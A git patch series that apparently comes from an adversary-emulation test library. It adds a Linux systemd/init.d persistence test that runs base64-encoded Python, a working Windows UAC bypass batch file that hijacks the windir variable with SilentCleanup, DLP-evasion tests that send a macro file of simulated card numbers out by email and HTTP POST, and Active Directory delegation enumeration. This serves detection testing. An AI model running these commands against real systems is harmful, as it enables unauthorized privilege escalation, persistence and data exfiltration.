From 557bd84925f3f2914fd5b6c6608abcbc82b9549e Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Tue, 1 Jun 2021 19:56:20 -0700 Subject: [PATCH 1/9] Atomic Tests for T1543.002 : Ubuntu, CentOS, Kali --- atomics/T1543.002/T1543.002.md | 65 ++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index c9bfec54..6f2f4e4b 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) +- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) +
@@ -75,4 +77,67 @@ systemctl daemon-reload +
+
+ +## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +cat > /etc/init.d/T1543.002 << EOF +#!/bin/bash +### BEGIN INIT INFO +# Provides : Atomic Test T1543.002 +# Required-Start: $all +# Required-Stop : +# Default-Start: 2 3 4 5 +# Default-Stop: +# Short Description: Atomic Test for Systemd Service Creation +### END INIT INFO +python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" +EOF + +chmod +x /etc/init.d/T1543.002 +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; +systemctl enable T1543.002 +systemctl start T1543.002 + +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 +systemctl daemon-reload +systemctl restart T1543.002 +``` + +#### Cleanup Commands: +```bash +systemctl stop T1543.002 +systemctl disable T1543.002 +rm -rf /etc/init.d/T1543.002 +systemctl daemon-reload +``` + + + +#### Dependencies: Run with `bash`! +##### Description: System must be Ubuntu ,Kali OR CentOS. +##### Check Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +``` +##### Get Prereq Commands: +```bash +echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. +``` + + + +
From 980c7e8bd56019b4a11b37e67231c81ee50d596a Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 2 Jun 2021 21:48:22 -0500 Subject: [PATCH 2/9] T1548.002-Update (#1492) * T1548.002-Update * formatting Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1548.002/T1548.002.yaml | 25 +++++++++++++++++++++++++ atomics/T1548.002/src/T1548.002.bat | 8 ++++++++ 2 files changed, 33 insertions(+) create mode 100644 atomics/T1548.002/src/T1548.002.bat diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 5186a236..17eb59f5 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -162,3 +162,28 @@ atomic_tests: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f name: command_prompt elevation_required: true +- name: Bypass UAC using SilentCleanup task + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: | + #{file_path} + name: command_prompt + elevation_required: false diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat new file mode 100644 index 00000000..d873b527 --- /dev/null +++ b/atomics/T1548.002/src/T1548.002.bat @@ -0,0 +1,8 @@ +@echo off +mode 18,1 +color FE +reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul +timeout /t 2 >nul +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul +timeout /t 3 >nul +reg delete "HKCU\Environment" /v "windir" /F \ No newline at end of file From 3726625d5809ae768d509383753c58418103674d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 3 Jun 2021 02:48:38 +0000 Subject: [PATCH 3/9] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1548.002/T1548.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 17eb59f5..619b5f6a 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -163,6 +163,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 description: | Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7d1c8c5d..361e31fb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -704,3 +704,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 788e0019-a483-45da-bcfe-96353d46820f 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff +28104f8a-4ff1-4582-bcf6-699dce156608 From 7549cc7d616fc60542f2aedefe1ed2db0b336f7b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 02:48:44 +0000 Subject: [PATCH 4/9] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 50 +++++++++++++++++++ atomics/T1548.002/T1548.002.md | 41 +++++++++++++++ 6 files changed, 99 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e84bab59..8f816a2c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -215,6 +216,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e3a45879..703da0de 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3a916e39..d1a78b05 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -227,6 +227,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -417,6 +418,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6433b60d..d1f5864e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -178,6 +178,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -308,6 +309,7 @@ - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - Atomic Test #8: Disable UAC using reg.exe [windows] + - Atomic Test #9: Bypass UAC using SilentCleanup task [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index af7d14dd..375f275d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -10120,6 +10120,31 @@ privilege-escalation: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1574.012: technique: external_references: @@ -19315,6 +19340,31 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: Bypass UAC using SilentCleanup task + auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + description: | + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + + For example, we can set the windir registry kye to: "cmd /k REM " + + And forcefully run SilentCleanup task: + + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the bat file + type: String + default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat + executor: + command: "#{file_path}\n" + name: command_prompt + elevation_required: false T1218.003: technique: external_references: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 98064122..597dc756 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia - [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe) +- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task) +
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En +
+
+ +## Atomic Test #9 - Bypass UAC using SilentCleanup task +Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + +There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + +For example, we can set the windir registry kye to: "cmd /k REM " + +And forcefully run SilentCleanup task: + +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + +REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{file_path} +``` + + + + + +
From 1540de2d2135095a0766f2123aaffbe3d2fdf881 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 3 Jun 2021 07:46:26 -0600 Subject: [PATCH 5/9] corrections as per BoBoSiKi008 (#1494) see Issue #1490 --- atomics/T1027/T1027.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4288d3ae..7210e5af 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -109,7 +109,7 @@ atomic_tests: supported_platforms: - windows input_arguments: - input_file: + input_file: description: Path of the XLSM file type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm @@ -125,10 +125,9 @@ atomic_tests: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" + Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP @@ -147,8 +146,7 @@ atomic_tests: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell From 9a3528e02721eb8b937b540559dfa6f8e2f884b8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 13:47:03 +0000 Subject: [PATCH 6/9] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 9 +++------ atomics/T1027/T1027.md | 4 ++-- 2 files changed, 5 insertions(+), 8 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 375f275d..7db65eb5 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28937,11 +28937,9 @@ defense-evasion: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 - Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm - -SmtpServer #{smtp_server}" + command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' + -Attachments #{input_file} -SmtpServer #{smtp_server} ' name: powershell @@ -28961,9 +28959,8 @@ defense-evasion: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ' name: powershell diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 74a09cdb..9f34ff74 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" +Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} ``` @@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm +Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ``` From 9b357633812ff2efdd473075aac619e00ffbf6df Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Fri, 4 Jun 2021 12:51:02 -0400 Subject: [PATCH 7/9] adds test for enumerating unconstrained delegation (#1495) * adds test for enumerating unconstrained delegation * small update to wording on dependency Co-authored-by: Carrie Roberts --- atomics/T1087.002/T1087.002.yaml | 48 +++++++++++++++++++++++++++++--- 1 file changed, 44 insertions(+), 4 deletions(-) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index d8f3a3f4..de4e2e26 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -69,7 +69,7 @@ atomic_tests: name: powershell - name: Adfind -Listing password policy auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx supported_platforms: @@ -93,7 +93,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Admins auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ supported_platforms: @@ -117,7 +117,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory User Objects auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -141,7 +141,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Exchange AD Objects auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -173,3 +173,43 @@ atomic_tests: command: | net user administrator /domain name: command_prompt + +- name: Enumerate Active Directory for Unconstrained Delegation + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: | + PowerShell ActiveDirectory Module must be installed + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: | + Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} From 3afb4da266a1b42b55a0e8f003c441cedd482acb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 16:51:20 +0000 Subject: [PATCH 8/9] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1087.002/T1087.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index de4e2e26..61822ffb 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -175,6 +175,7 @@ atomic_tests: name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b description: | Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 361e31fb..409c774d 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -705,3 +705,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 +46f8dbe9-22a5-4770-8513-66119c5be63b From 6c81bb1b0ba902269223281b5e3642f807bb6052 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 16:51:26 +0000 Subject: [PATCH 9/9] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 43 ++++++++++++++ atomics/T1087.002/T1087.002.md | 57 +++++++++++++++++++ 6 files changed, 104 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8f816a2c..0e530577 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -620,6 +620,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 703da0de..5d54166f 100644 --- 